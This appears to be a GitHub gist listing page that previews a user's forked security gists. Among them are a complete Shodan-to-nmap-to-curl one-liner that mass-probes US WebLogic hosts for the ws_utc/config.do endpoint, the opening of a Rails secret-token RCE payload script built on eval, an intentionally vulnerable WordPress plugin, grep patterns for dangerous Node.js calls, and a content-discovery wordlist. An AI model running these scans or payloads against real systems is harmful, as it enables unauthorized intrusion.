Splint3r7
/ nodejs-security-vulnerability-grep.sh
Created
October 5, 2024 09:06
— forked from nstarke/nodejs-security-vulnerability-grep.sh
Node.js Security Vulnerability Grep
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # this command will return instances where the child_process module is loaded. | |
| # that module is generally a good signal that the application is shelling out | |
| egrep -r --exclude-dir "node_modules" --include "*.js" --exclude "*.min.*" -e "require(\s*)\((\s*)'child_process'(\s*))" . | |
| # this command will return instances where code is dynamically executed. | |
| egrep -r --exclude-dir "node_modules" --include "*.js" --exclude "*.min.*" -e "eval(\s*)\(" . | |
| # this command will check common dangerous functions and report when strings are arguments | |
| egrep -r --exclude-dir "node_modules" --include "*.js" --exclude "*.min.*" -e "(setInterval|setTimeout|new(\s*)Function)(\s*)\((\s*)\".*\"" . |
Splint3r7
/ domain_All-Live-Datadog-Sites.csv
Created
December 25, 2023 18:19
— forked from JorgeFraga/domain_All-Live-Datadog-Sites.csv
We can make this file beautiful and searchable if this error is corrected: No commas found in this CSV file in line 0.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| domain | |
| 123rf.com | |
| 1stdibs.com | |
| 2u.com | |
| ba.com | |
| babylist.com | |
| bananatag.com | |
| baylor.edu | |
| bbcgoodfood.com | |
| bcm.edu |
Splint3r7
/ plugin.php
Created
March 16, 2022 07:14
— forked from htdat/plugin.php
An intentionally vulnerable plugin developed for WordPress plugin author education. http://make.wordpress.org/plugins/2013/04/09/intentionally-vulnerable-plugin/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* Plugin Name: Damn Vulnerable WordPress Plugin | |
| * Description: Intentionally vulnerable plugin for plugin author education | |
| * Version: 0.1 | |
| * Plugin URI: http://make.wordpress.org/plugins/2013/04/09/intentionally-vulnerable-plugin/ | |
| * Author: Jon Cave | |
| * Author URI: http://joncave.co.uk | |
| * License: GPLv2+ | |
| * | |
| * DO NOT RUN THIS PLUGIN ON AN INTERNET ACCESSIBLE SITE |
Splint3r7
/ ruby-open-uri-request.rb
Created
July 30, 2019 13:44
— forked from SabretWoW/ruby-open-uri-request.rb
4-line Ruby script that uses open-uri to fetch the contents of a URL & displays it in the console. This is the foundation for all web requests, whether to scrape a page, request a JSON response, and more.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # http://ruby-doc.org/stdlib-2.0.0/libdoc/open-uri/rdoc/OpenURI.html | |
| require 'open-uri' | |
| # Go fetch the contents of a URL & store them as a String | |
| response = open('http://www.example.com').read | |
| # "Pretty prints" the result to look like a web page instead of one long string of HTML | |
| URI.parse(response).class | |
| # Print the contents of the website to the console |
Splint3r7
/ content_discovery_all.txt
Created
May 5, 2019 11:00
— forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ` | |
| ~/ | |
| ~ | |
| ×™× | |
| ___ | |
| __ | |
| _ | |
| --- |
Splint3r7
/ gist:21318469ccb629d972586ca1ab8c21ad
Created
April 18, 2019 06:31
— forked from Viss/gist:e7c735ed389c8d055e6f31e845f25516
bash one liner for extracting shodan results for weblogic.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # this script was written by viss as a challenge from @random_robbie | |
| # This one-liner replaces a fairly lengthy python script | |
| # if you want to be walked through it, sign up for square cash, send $viss 20 dollars. Otherwise, flex your google fu! | |
| # oh, ps: you need to pip install shodan, and then configure the shodan cli client by giving it your api key. | |
| # then you're off to the races. | |
| shodan search --fields ip_str --limit 1000 'product:"Oracle Weblogic" port:"7001" country:"US"' | sort -u | nmap -sT -Pn -n -oG - -iL - -p 7001 | grep open | awk '{print $2}' | xargs -I % -n 1 -P 30 bash -c 'RESULT=`curl -s -I -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko0100101 Firefox/54.0" -H "Connection":"close" -H "Accept-Language":"en-US -H en;q=0.5" -H "Accept":"text/html -H application/xhtml+xml -H application/xml;q=0.9 -H */*;q=0.8" -H "Upgrade-Insecure-Requests":"1" %:7001/ws_utc/config.do | egrep HTTP`; echo "%: $RESULT";' |
Splint3r7
/ rails-secret-token-rce.rb
Created
April 10, 2019 07:43
— forked from rootxharsh/rails-secret-token-rce.rb
Rails Secret Token RCE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others | |
| require 'base64' | |
| require 'openssl' | |
| require 'optparse' | |
| require 'open-uri' | |
| SECRET_TOKEN = "SECRET HERE" | |
| code = "eval('`COMMAND HERE`')" | |
| marshal_payload = Base64.encode64( | |
| "\x04\x08" + | |
| "o" + |
Splint3r7
/ ssrf_iframe.svg
Created
April 5, 2019 09:34
— forked from akhil-reni/ssrf_iframe.svg
SVG Foreign Objects IFrame SSRF
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.